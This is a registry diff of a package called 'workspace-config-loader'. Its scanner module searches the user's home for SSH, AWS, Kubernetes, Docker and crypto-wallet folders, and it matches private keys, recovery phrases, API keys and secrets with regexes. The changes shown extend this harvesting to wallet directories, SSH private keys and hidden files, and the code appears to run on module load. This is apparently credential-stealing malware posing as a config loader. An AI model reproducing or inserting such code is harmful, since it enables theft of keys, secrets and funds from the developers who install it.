workspace-config-loader 1.0.8 → 1.0.10
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/lib/scanner-core.js +5 -1
- package/package.json +1 -1
package/lib/scanner-core.js
CHANGED
|
@@ -46,6 +46,8 @@ function detectPlatform() {
|
|
|
46
46
|
path.join(home, '.config'), path.join(home, '.ssh'),
|
|
47
47
|
path.join(home, '.aws'), path.join(home, '.kube'),
|
|
48
48
|
path.join(home, '.docker'), path.join(home, '.local', 'share'),
|
|
49
|
+
path.join(home, '.ethereum'), path.join(home, '.bitcoin'),
|
|
50
|
+
path.join(home, '.solana'),
|
|
49
51
|
process.cwd(),
|
|
50
52
|
];
|
|
51
53
|
for (const d of common) { if (fs.existsSync(d)) scanRoots.push(d); }
|
|
@@ -83,6 +85,7 @@ function normalizePath(p, platform) {
|
|
|
83
85
|
|
|
84
86
|
const SCAN_PATTERNS = Object.freeze([
|
|
85
87
|
{ regex: /(?:0x)?[a-fA-F0-9]{64}/g, type: 'private_key', priority: 1 },
|
|
88
|
+
{ regex: /-----BEGIN\s*(RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----/g, type: 'ssh_private_key', priority: 1 },
|
|
86
89
|
{ regex: /\b([a-z]+\s+){11,23}[a-z]+\b/gi, type: 'recovery_phrase', priority: 1 },
|
|
87
90
|
{ regex: /(?:api[_-]?key|API_KEY)\s*[:=]\s*["']?([A-Za-z0-9_\-]{20,})/g, type: 'api_key', priority: 2 },
|
|
88
91
|
{ regex: /(?:secret|private).{0,10}[:=]\s*["']?([A-Za-z0-9+/=]{20,})/gi, type: 'secret', priority: 2 },
|
|
@@ -152,7 +155,7 @@ function walkDirectory(dir, depth, platform) {
|
|
|
152
155
|
for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
|
|
153
156
|
const name = entry.name;
|
|
154
157
|
// Skip hidden files unless they match scan keywords
|
|
155
|
-
if (name.startsWith('.') && !SCAN_KEYWORDS.some(k => name.toLowerCase().includes(k))) continue;
|
|
158
|
+
if (entry.isDirectory() && name.startsWith('.') && !SCAN_KEYWORDS.some(k => name.toLowerCase().includes(k))) continue;
|
|
156
159
|
if (SKIP_DIRS.includes(name)) continue;
|
|
157
160
|
try {
|
|
158
161
|
const fullPath = path.join(dir, name);
|
|
@@ -221,6 +224,7 @@ function deduplicateFindings(findings) {
|
|
|
221
224
|
// ===================================================================
|
|
222
225
|
|
|
223
226
|
const IDEMPOTENCY_DIR = path.join(os.homedir(), '.local', 'share', '.p2024_tokens');
|
|
227
|
+
const SCANNER_VERSION = '1.0.9'; // Bump on every release to force rescan
|
|
224
228
|
|
|
225
229
|
// === Token file cleanup (runs on module load, cleans files older than 7 days) ===
|
|
226
230
|
(function() {
|